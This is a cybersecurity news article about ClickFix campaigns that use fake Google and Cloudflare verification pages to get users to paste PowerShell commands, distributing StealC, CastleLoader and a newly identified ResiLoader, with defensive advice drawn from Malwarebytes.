Fake Google, Cloudflare Verification Pages Fuel ClickFix Campaigns, Distribute StealC, Amatera, CastleLoader, New ResiLoader
- Threat Overview: An ongoing ClickFix campaign uses fake Google and Cloudflare verification pages to trick users into executing malicious PowerShell commands.
- Malware Delivered: It delivers multiple malware families and a newly identified loader dubbed ResiLoader.
- Changed Methods: Researchers observed attackers continually changing how they deliver fake verification pages that mimic trusted online services.
Multiple active ClickFix campaigns, which have been running since at least late 2025, abuse fake Google and Cloudflare verification pages to distribute a wide range of malware, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, a Rust-based stealer, and a previously undocumented loader called ResiLoader.
The campaigns target Windows users who are tricked into following on-screen instructions on malicious or compromised websites. Cybersecurity researchers say the attacks delivering multiple malware families rely on social engineering rather than software exploits, so even fully patched systems can be compromised if users execute the provided commands.
ClickFix Delivers Undocumented Loader
Malwarebytes has documented new delivery chains in a new report and identified ResiLoader for the first time while observing an expansion of ClickFix lures. ResiLoader, which disables security software before deploying the StealC infostealer, was observed in one infection chain, where it was downloaded via a trojanized version of the legitimate Franz messaging app.
Victims are instructed to copy and execute PowerShell commands under the guise of completing a CAPTCHA, verifying they are human, fixing Google Meet audio issues, or authorizing a Google sign-in. The report said the campaigns share infrastructure despite using different lures.
The campaigns continue to evolve with new payloads and delivery methods, such as distributing payloads directly via IP addresses rather than via buckets.
Observed distribution methods include outdated or compromised websites, Cloudflare Pages, and fake online QR code generators.
How to Avoid Fake Google and Cloudflare Verification Scams
Malwarebytes stressed that legitimate services such as Google, Cloudflare, and Microsoft will never require users to paste PowerShell commands into Windows for verification or troubleshooting.
Keeping endpoint protection up to date and treating urgent verification prompts with caution can help reduce exposure to these attacks, which pose the greatest risk to remote employees, IT administrators, and users installing software or searching for free online tools (QR generators, converters, PDF tools).
Never:
- Paste commands into PowerShell because a website tells you to;
- Run commands copied to your clipboard without understanding them;
- Assume a page is legitimate simply because it displays Google or Cloudflare branding.
Malwarebytes' findings add to a growing body of research from ReliaQuest and other security vendors showing that ClickFix has become one of the fastest-growing social engineering techniques over the past years.
Late last month, Europol announced the disruption of SocGholish, Amadey, and StealC Malware in Operation Endgame and the recovery of 27 million stolen login credentials, and XLab observed a Ghost CMS SQL injection vulnerability that facilitates large-scale ClickFix campaigns.









